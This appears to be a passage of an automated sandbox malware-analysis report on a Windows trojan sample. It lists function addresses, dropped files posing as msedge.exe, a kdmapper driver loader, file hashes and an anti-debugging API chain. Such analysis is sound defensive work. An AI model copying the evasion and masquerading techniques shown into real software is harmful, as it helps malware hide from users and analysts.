                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4A0BA00_2_00007FF68B4A0BA0
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B498BA00_2_00007FF68B498BA0
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4B9B400_2_00007FF68B4B9B40
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4992500_2_00007FF68B499250
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4AEA700_2_00007FF68B4AEA70
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4A3A700_2_00007FF68B4A3A70
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4CBAFC0_2_00007FF68B4CBAFC
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4BB2D00_2_00007FF68B4BB2D0
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B49A2F00_2_00007FF68B49A2F0
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4A59900_2_00007FF68B4A5990
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4AA1600_2_00007FF68B4AA160
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4909600_2_00007FF68B490960
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4A52200_2_00007FF68B4A5220
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4AF0400_2_00007FF68B4AF040
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B49A0400_2_00007FF68B49A040
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B48B8750_2_00007FF68B48B875
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4CA0D00_2_00007FF68B4CA0D0
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B49F8F00_2_00007FF68B49F8F0
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4997A00_2_00007FF68B4997A0
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B49A8000_2_00007FF68B49A800
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4948200_2_00007FF68B494820
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4A16900_2_00007FF68B4A1690
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4C268B0_2_00007FF68B4C268B
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B48E6800_2_00007FF68B48E680
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B490E800_2_00007FF68B490E80
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4C267F0_2_00007FF68B4C267F
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4A76800_2_00007FF68B4A7680
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4C36B00_2_00007FF68B4C36B0
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4C26AF0_2_00007FF68B4C26AF
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4C269D0_2_00007FF68B4C269D
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4C264F0_2_00007FF68B4C264F
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4A2E500_2_00007FF68B4A2E50
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4C26430_2_00007FF68B4C2643
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4C26730_2_00007FF68B4C2673
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4C26670_2_00007FF68B4C2667
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4C265B0_2_00007FF68B4C265B
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4B2F100_2_00007FF68B4B2F10
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4C270C0_2_00007FF68B4C270C
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4C26FD0_2_00007FF68B4C26FD
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4B77300_2_00007FF68B4B7730
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4C27330_2_00007FF68B4C2733
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4C272A0_2_00007FF68B4C272A
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4C271B0_2_00007FF68B4C271B
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4C26D00_2_00007FF68B4C26D0
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B496ED00_2_00007FF68B496ED0
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4C26C10_2_00007FF68B4C26C1
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4C26EE0_2_00007FF68B4C26EE
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4BA6E00_2_00007FF68B4BA6E0
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4C26DF0_2_00007FF68B4C26DF
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4BDD900_2_00007FF68B4BDD90
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4B0D800_2_00007FF68B4B0D80
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B49C5500_2_00007FF68B49C550
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4985700_2_00007FF68B498570
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4A65D00_2_00007FF68B4A65D0
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B495DF00_2_00007FF68B495DF0
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_0015848E5_2_0015848E
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_001640885_2_00164088
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_001600B75_2_001600B7
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_001540FE5_2_001540FE
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_001671535_2_00167153
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_001751C95_2_001751C9
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_001662CA5_2_001662CA
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_001532F75_2_001532F7
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_001643BF5_2_001643BF
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_0015C4265_2_0015C426
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_0017D4405_2_0017D440
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_0015F4615_2_0015F461
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_001677EF5_2_001677EF
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_0015286B5_2_0015286B
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_0017D8EE5_2_0017D8EE
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_0015E9B75_2_0015E9B7
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_001819F45_2_001819F4
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_00166CDC5_2_00166CDC
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_00163E0B5_2_00163E0B
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_00174F9A5_2_00174F9A
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_0015EFE25_2_0015EFE2
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043804011_2_00438040
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0042C07011_2_0042C070
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044907011_2_00449070
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040100011_2_00401000
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040B0E011_2_0040B0E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040C08011_2_0040C080
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0042D15011_2_0042D150
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004491F011_2_004491F0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041F19311_2_0041F193
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040924011_2_00409240
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0042C24311_2_0042C243
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004492F011_2_004492F0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043E2A011_2_0043E2A0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004012B311_2_004012B3
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040135911_2_00401359
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041636111_2_00416361
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0042D3CC11_2_0042D3CC
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004493D011_2_004493D0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004483B011_2_004483B0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004113BD11_2_004113BD
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040546011_2_00405460
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044742911_2_00447429
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004094D711_2_004094D7
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040A4E011_2_0040A4E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0042B49011_2_0042B490
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004074B011_2_004074B0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040B57011_2_0040B570
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004366E011_2_004366E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041D6A011_2_0041D6A0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044970011_2_00449700
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004117C011_2_004117C0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0042F7DB11_2_0042F7DB
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040885011_2_00408850
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040389011_2_00403890
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044A8B011_2_0044A8B0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004488B011_2_004488B0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043697011_2_00436970
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0045392E11_2_0045392E
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041399C11_2_0041399C
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040AA0011_2_0040AA00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00427AFB11_2_00427AFB
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0042BC5011_2_0042BC50
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00413CC611_2_00413CC6
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0042CCDD11_2_0042CCDD
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0042CCF511_2_0042CCF5
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00429DF211_2_00429DF2
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00437D9011_2_00437D90
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040CE0011_2_0040CE00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00431E0011_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00415EF611_2_00415EF6
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00407EB011_2_00407EB0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00427F6211_2_00427F62
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00443FA011_2_00443FA0
                                Source: C:\Edge\msedge.exeCode function: 15_2_00007FFB4B100D8015_2_00007FFB4B100D80
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeCode function: 21_2_00007FFB4B0F0D8021_2_00007FFB4B0F0D80
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeCode function: 22_2_00007FFB4B0E0D8022_2_00007FFB4B0E0D80
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFB4B0E8E2531_2_00007FFB4B0E8E25
                                Source: C:\Edge\msedge.exeCode function: 37_2_00007FFB4B0E0B0637_2_00007FFB4B0E0B06
                                Source: C:\Edge\msedge.exeCode function: 37_2_00007FFB4B10122537_2_00007FFB4B101225
                                Source: C:\Edge\msedge.exeCode function: 37_2_00007FFB4B1097E037_2_00007FFB4B1097E0
                                Source: C:\Edge\msedge.exeCode function: 37_2_00007FFB4B10D30A37_2_00007FFB4B10D30A
                                Source: C:\Edge\msedge.exeCode function: 37_2_00007FFB4B10BF4237_2_00007FFB4B10BF42
                                Source: C:\Edge\msedge.exeCode function: 37_2_00007FFB4B0D0D8037_2_00007FFB4B0D0D80
                                Source: C:\Edge\msedge.exeCode function: 37_2_00007FFB4B0E0FC737_2_00007FFB4B0E0FC7
                                Source: C:\Edge\msedge.exeCode function: 37_2_00007FFB4B0E177E37_2_00007FFB4B0E177E
                                Source: C:\Edge\msedge.exeCode function: 37_2_00007FFB4B0E11A937_2_00007FFB4B0E11A9
                                Source: C:\Edge\msedge.exeCode function: 39_2_00007FFB4B110B0639_2_00007FFB4B110B06
                                Source: C:\Edge\msedge.exeCode function: 39_2_00007FFB4B100D8039_2_00007FFB4B100D80
                                Source: C:\Edge\msedge.exeCode function: 39_2_00007FFB4B13122539_2_00007FFB4B131225
                                Source: C:\Edge\msedge.exeCode function: 39_2_00007FFB4B1397E039_2_00007FFB4B1397E0
                                Source: C:\Edge\msedge.exeCode function: 39_2_00007FFB4B13D30A39_2_00007FFB4B13D30A
                                Source: C:\Edge\msedge.exeCode function: 39_2_00007FFB4B13BF4239_2_00007FFB4B13BF42
                                Source: C:\Edge\msedge.exeCode function: 39_2_00007FFB4B110FC739_2_00007FFB4B110FC7
                                Source: C:\Edge\msedge.exeCode function: 39_2_00007FFB4B11177E39_2_00007FFB4B11177E
                                Source: C:\Edge\msedge.exeCode function: 39_2_00007FFB4B1111A939_2_00007FFB4B1111A9
                                Source: C:\Edge\msedge.exeCode function: 41_2_00007FFB4B0C0D8041_2_00007FFB4B0C0D80
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeCode function: 42_2_00007FFB4B100D8042_2_00007FFB4B100D80
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeCode function: 42_2_00007FFB4B110B0642_2_00007FFB4B110B06
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeCode function: 42_2_00007FFB4B13122542_2_00007FFB4B131225
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeCode function: 42_2_00007FFB4B1397E042_2_00007FFB4B1397E0
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeCode function: 42_2_00007FFB4B13D30A42_2_00007FFB4B13D30A
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeCode function: 42_2_00007FFB4B13BF4242_2_00007FFB4B13BF42
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeCode function: 42_2_00007FFB4B110FC742_2_00007FFB4B110FC7
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeCode function: 42_2_00007FFB4B11177E42_2_00007FFB4B11177E
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeCode function: 42_2_00007FFB4B1111A942_2_00007FFB4B1111A9
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeCode function: 47_2_00007FFB4B100D8047_2_00007FFB4B100D80
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeCode function: 47_2_00007FFB4B110B0647_2_00007FFB4B110B06
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeCode function: 47_2_00007FFB4B13122547_2_00007FFB4B131225
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeCode function: 47_2_00007FFB4B13D30A47_2_00007FFB4B13D30A
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeCode function: 47_2_00007FFB4B1397E047_2_00007FFB4B1397E0
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeCode function: 47_2_00007FFB4B13BF4247_2_00007FFB4B13BF42
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeCode function: 47_2_00007FFB4B110FC747_2_00007FFB4B110FC7
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeCode function: 47_2_00007FFB4B11177E47_2_00007FFB4B11177E
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeCode function: 47_2_00007FFB4B1111A947_2_00007FFB4B1111A9
                                Source: C:\Edge\msedge.exeCode function: 48_2_00007FFB4B0D0D8048_2_00007FFB4B0D0D80
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeCode function: 55_2_00007FFB4B0D0D8055_2_00007FFB4B0D0D80
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeCode function: 55_2_00007FFB4B10122555_2_00007FFB4B101225
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeCode function: 55_2_00007FFB4B1097E055_2_00007FFB4B1097E0
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeCode function: 55_2_00007FFB4B10D30A55_2_00007FFB4B10D30A
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeCode function: 55_2_00007FFB4B10BF4255_2_00007FFB4B10BF42
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeCode function: 55_2_00007FFB4B0E0B0655_2_00007FFB4B0E0B06
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeCode function: 55_2_00007FFB4B0E0FC755_2_00007FFB4B0E0FC7
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeCode function: 55_2_00007FFB4B0E177E55_2_00007FFB4B0E177E
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeCode function: 55_2_00007FFB4B0E11A955_2_00007FFB4B0E11A9
                                Source: Joe Sandbox ViewDropped File: C:\Edge\msedge.exe 1B8125938BF1872C9589546DDF4DD17E765A351046AB7F2639540C77E38546BC
                                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe 1B8125938BF1872C9589546DDF4DD17E765A351046AB7F2639540C77E38546BC
                                Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\DqsZwsEl.log 7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                Source: C:\Windows\Speech\kdmapper.exeCode function: String function: 0016F5F0 appears 31 times
                                Source: C:\Windows\Speech\kdmapper.exeCode function: String function: 0016EC50 appears 56 times
                                Source: C:\Windows\Speech\kdmapper.exeCode function: String function: 0016EB78 appears 39 times
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0040CBE0 appears 53 times
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0040EE60 appears 145 times
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: String function: 00007FF68B4BE8C0 appears 148 times
                                Source: WpXNITDI.log.15.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                Source: iacMOeMk.log.15.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                Source: XmyVeTRC.log.15.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                Source: GfhqKgmo.log.15.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                Source: 4tXm5yPtiy.exe, 00000000.00000003.1805009867.000002734FECC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVQP.exed! vs 4tXm5yPtiy.exe
                                Source: 4tXm5yPtiy.exe, 00000000.00000002.2679910423.000002734FED1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVQP.exed! vs 4tXm5yPtiy.exe
                                Source: msedge.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: physmeme.exe.7.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: wCnmgKwwXYQbWeNvWeCCOp.exe.15.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: WpXNITDI.log.15.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                                Source: iacMOeMk.log.15.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                                Source: XmyVeTRC.log.15.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                                Source: GfhqKgmo.log.15.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                                Source: classification engineClassification label: mal100.spre.troj.expl.evad.winEXE@85/66@18/4
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_00156C74 GetLastError,FormatMessageW,5_2_00156C74
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4B4BD0 IsDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,CheckRemoteDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,memset,GetCurrentThread,GetThreadContext,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,memset,VirtualFree,SetLastError,GetLastError,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualFree,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,OpenThread,LoadLibraryA,GetProcAddress,NtSetInformationThread,CloseHandle,Thread32Next,CloseHandle,GetTickCount,GetTickCount,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetProcessHeap,HeapSetInformation,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,0_2_00007FF68B4B4BD0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004345E0 CoCreateInstance,11_2_004345E0
